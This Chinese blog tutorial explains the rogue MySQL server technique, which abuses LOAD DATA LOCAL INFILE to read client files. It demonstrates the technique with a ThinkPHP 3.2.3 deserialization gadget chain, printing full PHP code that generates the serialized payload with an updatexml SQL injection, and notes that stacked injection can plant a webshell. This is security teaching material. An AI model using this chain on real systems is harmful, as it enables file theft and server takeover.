前言
注:本文不涉及对MySQL协议报文研究,仅讲解原理,并且做部分演示 。搭建MySQL恶意服务器读取文件这件事,虽然直接利用门槛较高,但是由于在网上看到了一种比较新颖的利用方式(利用社会工程学引诱用户连接MySQL进而读取用户文件),个人觉得比较有意思,总结了一下攻击原理以及攻击方式,因此就有了这篇文章 。
原理在阐述具体原理之前,先介绍几个SQL语句,以便后文理解
首先在tmp目录下新建一个tmp.txt
内容如下:
文章插图
然后执行下方SQL语句,即可将tmp.txt文件导入其中
mysql> load data local infile "/tmp/tmp.txt" into table test fields terminated by 'n';Query OK, 3 rows affected (2.63 sec)Records: 3Deleted: 0Skipped: 0Warnings: 0mysql> select * from Test;+-------+| name|+-------+| admin || user|| Lxxx|+-------+3 rows in set (0.00 sec)- load data local infile语句会读取客户端本地的文件
- load data infile语句会读取服务端本地的文件
- terminated by表示以某某字符分割,默认为Tab,这里我设置为了n
因为一般情况下,调试SQL都是在本机,并且数据库也在本机,这样的情况就导致,客户端和服务端都是在本地,有点难区分,下面我用一张图来简述 。
文章插图
在本地,由于客户端和服务端都是在同一个磁盘下,因此,在本地,无论是否加local都是可以将文件传入数据库的,而后面讲到利用MySQL恶意服务器读取文件的漏洞,就是需要使用local,来达到将文件带出的目的 。
下面我画了两张图,第一张图是正常业务流程,第二张图是攻击者恶意攻击的流程
正常的后端业务流程如下:
文章插图
当攻击者劫持后端服务器,并且在公网中搭建恶意的MySQL后,流程图如下:
文章插图
这样攻击者就可以在后端达到任意文件下载的目的 。
演示
虽说在之前的某个CTF比赛出过类似的题目,但是我这里还是使用Thinkphp3.2.3存在的反序列化漏洞,结合MySQL恶意服务器读取敏感文件,进而RCE的样例 。首先在本地先启动一个ThinkPHP3.2.3的框架,连接好数据库,在Application/Home/Controller/HelloController.class.php控制器中写一个反序列化入口
<?phpnamespace HomeController;use ThinkController;class HelloController extends Controller{public function index($Lxxx){echo base64_decode($Lxxx);$a = unserialize(base64_decode($Lxxx));}}具体的链子,我就不跟了,网上也有很多,虽然链子具体的方法不跟进,但是我还是需要介绍一下这条链子能起到一个什么作用 。- 首先需要一个反序列化入口,这是毋庸置疑的,没有反序列化入口,那就无法进行反序列化,所以上方我就在HelloController控制器中自己写了一个反序列化入口
- 这条链子最终的链尾是需要数据库的相关信息,例如数据库名,数据库端口,数据库用户以及密码,并且这条链子是允许使用堆叠注入的,因此如果知道数据库相关信息,那么就可以利用堆叠注入写入一句话木马进而getshell
<?phpnamespace ThinkDbDriver{use PDO;class Mysql{protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true// 开启才能读取文件);protected $config = array("debug"=> 1,"database" => "tp323","hostname" => "127.0.0.1","hostport" => "8889","charset"=> "utf8","username" => "root","password" => "root");}}namespace ThinkImageDriver{use ThinkSessionDriverMemcache;class Imagick{private $img;public function __construct(){$this->img = new Memcache();}}}namespace ThinkSessionDriver{use ThinkModel;class Memcache{protected $handle;public function __construct(){$this->handle = new Model();}}}namespace Think{use ThinkDbDriverMysql;class Model{protected $options= array();protected $pk;protected $data = https://www.isolves.com/it/sjk/MYSQL/2022-07-15/array();protected $db = null;public function __construct(){$this->db = new Mysql();$this->options['where'] = '';$this->pk = 'id';$this->data[$this->pk] = array("table" => "tp_user where 1=updatexml(1,concat(0x7e,version(),0x7e),1)#","where" => "1=1");}}}namespace {echo base64_encode(serialize(new ThinkImageDriverImagick()));}
推荐阅读
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 新一代HTAP数据库崛起,MySQL生态的最佳归宿?
- mysql中all用法和any的用法和内外连接,全外连接,联合查询,自连接
- MySQL数据库 数据表创建教程
- MySQL查询慢别怪索引,没准是这些原因导致的
- mysql 慢查询
- linux系统安装mysql提示初始化失败怎么处理?
- python接口自动化之MySQL数据连接
- 豆瓣|周杰伦新专辑未发豆瓣先开分 疑被恶意评价引网友不满:要官方给说法
- 越野车恶意碾压拖行致交警殉职-恶意碾压拖行交警-故意撞交警怎么判刑
- 越野车恶意碾压拖行致交警殉职-内蒙古一交警遭越野车碾压拖行身亡
